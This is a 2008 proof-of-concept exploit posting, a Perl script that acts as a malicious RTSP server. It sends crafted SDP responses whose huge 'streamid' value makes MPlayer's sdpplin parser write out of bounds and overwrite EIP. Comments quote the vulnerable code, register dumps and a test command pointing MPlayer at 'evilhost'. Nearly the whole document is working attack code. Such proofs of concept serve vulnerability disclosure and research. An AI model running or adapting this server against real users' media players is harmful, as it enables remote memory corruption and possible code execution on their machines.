mplayer-overflowpoc.txt
Posted on 26 March 2008
#!/usr/bin/perl # Huston, mplayer got some vulns! :( # CVE-2008-0073 also apply to mplayer and vlc with some distinctions. # # Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box. # # The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite # EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and # some before it. # # Vulnerable code: # sdpplin_parse_stream() # desc->stream_id=atoi(buf); # spplin_parse() # desc->stream[stream->stream_id]=stream; # # Test: # - mplayer rtsp://evilhost/evil.rm # eax 0xa0737008 // pointer to desc->stream # edx 0x0495badd // "streamid" value # edi 0x089b59e8 // pointer to stream # # <sdpplin_parse+731>: mov DWORD PTR [eax+edx*4],edi use warnings; use strict; use IO::Socket; my $evil_num = "127467297"; # this is a 4byte offset from desc->stream my $rtp_hello = "RTSP/1.0 200 OK ". "CSeq: 1 ". "Date: Thu, 20 Mar 2008 20:07:39 GMT ". "Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server) ". "Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN ". "RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c ". "StatsMask: 3 "; my $rtp_evil = "RTSP/1.0 200 OK ". "CSeq: 2 ". "Date: Thu, 20 Mar 2008 20:08:34 GMT ". "vsrc: http://0.00.00.00:31337 ". "Content-base: rtsp://0.00.00.00:554/bu.rm ". "ETag: 55370-2 ". "Session: 93033-2 ". "Content-type: application/sdp ". "Content-length: 677 ". "v=0 ". "o=-1028652722 1028652722 IN IP4 0.00.00.00 ". "s=realmp3 ". "i=<No author> <No copyright> ". "c=IN IP4 0.0.0.0 ". "t=0 0 ". "a=SdpplinVersion:1610645242 ". "a=StreamCount:integer;"1166000000" ". "a=Title:buffer;"dtFabH2rNoP=" ". "a=range:npt=0-39.471000 ". "m=audio 0 RTP/AVP 101 ". # this is referenced by "stream" "b=AS:128 ". "a=control:streamid=$evil_num ". "a=range:npt=0-39.471000 ". "a=length:npt=39.471000 ". "a=rtpmap:101 X-MP3-draft-00/1000 ". "a=mimetype:string;"audio/X-MP3-draft-00" ". "a=StartTime:integer;0 ". "a=AvgBitRate:integer;128000 ". "a=SampleRate:integer;44100 ". "a=AvgPacketSize:integer;417 ". "a=Preroll:integer;1000 ". "a=NumChannels:integer;2 ". "a=MaxPacketSize:integer;1024 ". "a=ASMRuleBook:string;"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;" "; my @resps = ( $rtp_hello, $rtp_evil, "RTSP/1.0 200 OK ". "CSeq: 3 ". "Date: Sat, 22 Mar 2008 20:45:47 GMT ". "Session: 93033-2 ". "Reconnect: true ". "RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b ". "RDTFeatureLevel: 2 ". "Transport: x-pn-tng/tcp;interleaved=0 ", "RTSP/1.0 200 OK ". "CSeq: 4 ". "Date: Sat, 22 Mar 2008 15:11:06 GMT ". "Session: 93033-2 ", "RTSP/1.0 200 OK ". "CSeq: 5 ". "Date: Sat, 22 Mar 2008 15:11:06 GMT". "RTP-Info: url=rtsp://0.00.00.00/bu.rm ", ); my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1); while(my $csock = $sock->accept) { foreach my $resp(@resps) { my $buf = read_from_sock($csock); print $csock $resp; } } sub read_from_sock() { my ($sock) = @_; my $buffer = ""; while(<$sock>) { return $buffer if /^ $/; $buffer .= $_; } return $buffer; }
